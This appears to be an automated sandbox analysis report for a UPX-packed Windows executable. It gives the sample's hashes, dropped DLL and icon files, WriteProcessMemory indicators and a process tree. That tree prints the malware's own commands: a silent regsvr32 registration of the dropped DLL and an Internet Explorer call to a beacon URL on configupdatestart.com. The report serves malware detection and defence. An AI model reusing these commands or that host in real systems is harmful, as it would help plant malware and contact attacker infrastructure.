2e18c6ff62c185b62f0d2aeac14fe9a5c52db23c4c88a2af9906c40add1471fe

Analysis

max time kernel
0s
max time network
138s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
05-01-2024 10:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

436b960bccf80fe03817b7ce13da3cc5.exe
Size

93KB
MD5

436b960bccf80fe03817b7ce13da3cc5
SHA1

19be90d277b339231554af555fa16e5f14c33ba2
SHA256

2e18c6ff62c185b62f0d2aeac14fe9a5c52db23c4c88a2af9906c40add1471fe
SHA512

28fff3f95ec6f58f12b4090960fa0512c19d707e5fdaad61cc85963843cdfea1a46a3b47c88f0383866ecaa617332b2448693c8590a80546b4ca0a3af8795861
SSDEEP

1536:PP45ClPkRgIrOkvKKPHabMPd1FjZjT8wtMocDSDYcqN2W5nTKEzZ5U:n5lYOoabMp5T8BHDJcqXzZm

Score

7^/10

upx

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2524-0-0x0000000000400000-0x0000000000445000-memory.dmp	upx
behavioral1/memory/2524-27-0x0000000000400000-0x0000000000445000-memory.dmp	upx

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\p.ico	436b960bccf80fe03817b7ce13da3cc5.exe
File created	C:\Windows\SysWOW64\sf.ico	436b960bccf80fe03817b7ce13da3cc5.exe
File created	C:\Windows\SysWOW64\c.ico	436b960bccf80fe03817b7ce13da3cc5.exe
File created	C:\Windows\SysWOW64\m.ico	436b960bccf80fe03817b7ce13da3cc5.exe
File created	C:\Windows\SysWOW64\m3.ico	436b960bccf80fe03817b7ce13da3cc5.exe
File created	C:\Windows\SysWOW64\s.ico	436b960bccf80fe03817b7ce13da3cc5.exe
File created	C:\Windows\SysWOW64\fejokt.dll	436b960bccf80fe03817b7ce13da3cc5.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\ios.dat	436b960bccf80fe03817b7ce13da3cc5.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2524 wrote to memory of 2796	2524	436b960bccf80fe03817b7ce13da3cc5.exe	19
PID 2524 wrote to memory of 2796	2524	436b960bccf80fe03817b7ce13da3cc5.exe	19
PID 2524 wrote to memory of 2796	2524	436b960bccf80fe03817b7ce13da3cc5.exe	19
PID 2524 wrote to memory of 2796	2524	436b960bccf80fe03817b7ce13da3cc5.exe	19
PID 2524 wrote to memory of 2796	2524	436b960bccf80fe03817b7ce13da3cc5.exe	19
PID 2524 wrote to memory of 2796	2524	436b960bccf80fe03817b7ce13da3cc5.exe	19
PID 2524 wrote to memory of 2796	2524	436b960bccf80fe03817b7ce13da3cc5.exe	19
PID 2524 wrote to memory of 2388	2524	436b960bccf80fe03817b7ce13da3cc5.exe	24
PID 2524 wrote to memory of 2388	2524	436b960bccf80fe03817b7ce13da3cc5.exe	24
PID 2524 wrote to memory of 2388	2524	436b960bccf80fe03817b7ce13da3cc5.exe	24
PID 2524 wrote to memory of 2388	2524	436b960bccf80fe03817b7ce13da3cc5.exe	24

C:\Users\Admin\AppData\Local\Temp\436b960bccf80fe03817b7ce13da3cc5.exe
"C:\Users\Admin\AppData\Local\Temp\436b960bccf80fe03817b7ce13da3cc5.exe"
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\SysWOW64\regsvr32.exe
  "C:\Windows\System32\regsvr32.exe" /s C:\Windows\system32\fejokt.dll
  2⤵
  PID:2796
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://configupdatestart.com/bind2.php?id=3913086
  2⤵
  PID:2388

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2388 CREDAT:275457 /prefetch:2
1⤵
PID:2648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f4cbaa2c884820713faefdd662ac1c85

SHA1
c0a676804d3466a28ed9ecd9835742a821dc75c6

SHA256
d82da5eb10e9b9a1a75688d22fe1e04d8541e79e2d99a2c2a8a68bf6b295f0ec

SHA512
95f4c8f508d9f62e2564fef26a0cd7ff8476d36914158ecd78161774cf3c585aa80bb1790c6f89e99c280537af5a92cf6fd7ac4a6aeeffc20f4d6693387f9ce6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
eb7cd481ae457015b840a5e4356c3204

SHA1
75815a27fab20e8997bf1b1d5dfbeee330bb0e2a

SHA256
3655b0b696848fafcb7a1a8b9a27e96d267d141e34bc7df8abbc89d29b24d5d0

SHA512
149a26c0aaf005016261f7aea662992a5e134808fd2146807be66502961771bca30d30eb4aaa7325b1a9d35594f6be24ed30e882315ee0e27f8b568387c52891

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e16103b6003493323c72e33c44595541

SHA1
e8f5874d49362d869c4b3d9ee63abb59168fe3db

SHA256
160fea539c7642e3b01bf6ecfee21b44967f0e1f773fa42b165c054c2cc226ac

SHA512
f86a11bc9521913ba9746e18ae107bcc88a32d2d043b9e5ffb87c344e5bf4f7ebd8e7c34dce419a1f8676756822d9a6b3f3f8732dda746f8ed45664b953b7a2a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
dfe3fc29c6dc222d42d2a8550acbf517

SHA1
f321147bd336c4807c641bcbf238afea2fa065f0

SHA256
5cc0feb2d731c2aef99c1e4bf8c3e768bc0f3ad917ab6c00bef53ff0d5b22ddb

SHA512
32eeb5a52057c787251005f66db1e7ec4452d5f1538c4fc091db55cf07585afc1eb71020e0c11a446c30348fb26a97c3955b3087ae75299f4dbace5660bbdd02

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
3a0f83efd60b672f789c68f034a36b7c

SHA1
6543a034e5167ebbe42760f8f1fa438a11d201fb

SHA256
a70207dca69fd765dd539d147df33889ed64ff1ba45165e66cb84ccc6660c947

SHA512
be6c9979fcfab2b8048f679c4ba195aa3cda627d747e6ef9c6a12cf0a3815f63b79f870995720f4d3a32e293c59f0864b2ac82e5e16ff416cbdc15de1f1cee25

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6829f49b8eb78764f1f78a13df6679aa

SHA1
d20e9511f818c876f1274e3da30df31dbb042248

SHA256
3575b9a31e2c138d8cf5a5a493e701fd59eeebf3714ec2e0ea22c923e0c62a64

SHA512
e7080050d35ed6f2006c5d3e992256feb9d2567b11c17a8f8331dcb913566314d28a927e873c5be36847b6ecf0c8687c689fb34d21b5da5df6fde19a1acd0726

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab72D2.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7352.tmp

Filesize
32KB

MD5
4637dea3b8093898fa14a66f3deacd7d

SHA1
e9ea6340e7c2f909acfe3d660d6233ff22e228c9

SHA256
98e871a47e13990e64b6171d1b178964e1116b3b1d77eda0a93a66ae57a55b5d

SHA512
b56d8e9272c9c87bf99d43b5f310209215a0456a1b4abf5f18afb7f702b646e224950c0a99e8ff614e7871602e5dd06ef43104a613c401a5fb7fc85dcd158c6f

Download Submit
C:\Windows\SysWOW64\fejokt.dll

Filesize
13KB

MD5
bcb03563ea4c0c79e069d6b9344a8993

SHA1
fa6ad6c288e5bc911b49a8c0e58f3ebf715a002a

SHA256
072e519efa9cdf32bcebf7541c661970b6abe4b570272743ca6c756d414f8cfb

SHA512
73ac0caeaa1fd8dea67df879cb6e503a030c8a83e714e46dcb2252ed684c5c662adbbedaaf051ddfd835fc58eb1db07ee96e500bc20c96baefb2b2ebdb4d7390

Download Submit
\Windows\SysWOW64\fejokt.dll

Filesize
20KB

MD5
a1b2472ef199cf494a46a6321c82b572

SHA1
2c81222ba1294011e3ad3dd55f54fbb578482ea0

SHA256
8043e18f7cb49bbd6908a92a3004374c2514113788af0931902e3ac34c1d8729

SHA512
2fd303c0e172f8e4d080dce5328cb81b56447bbacfe94ba6c173e463c7767c1a74d10e7ef3c1d5e2c0113f4a0b945b127d9a34ab958ec917b4f16895aab5d4a6

Download Submit
memory/2524-0-0x0000000000400000-0x0000000000445000-memory.dmp

Filesize
276KB

Download
memory/2524-27-0x0000000000400000-0x0000000000445000-memory.dmp

Filesize
276KB

Download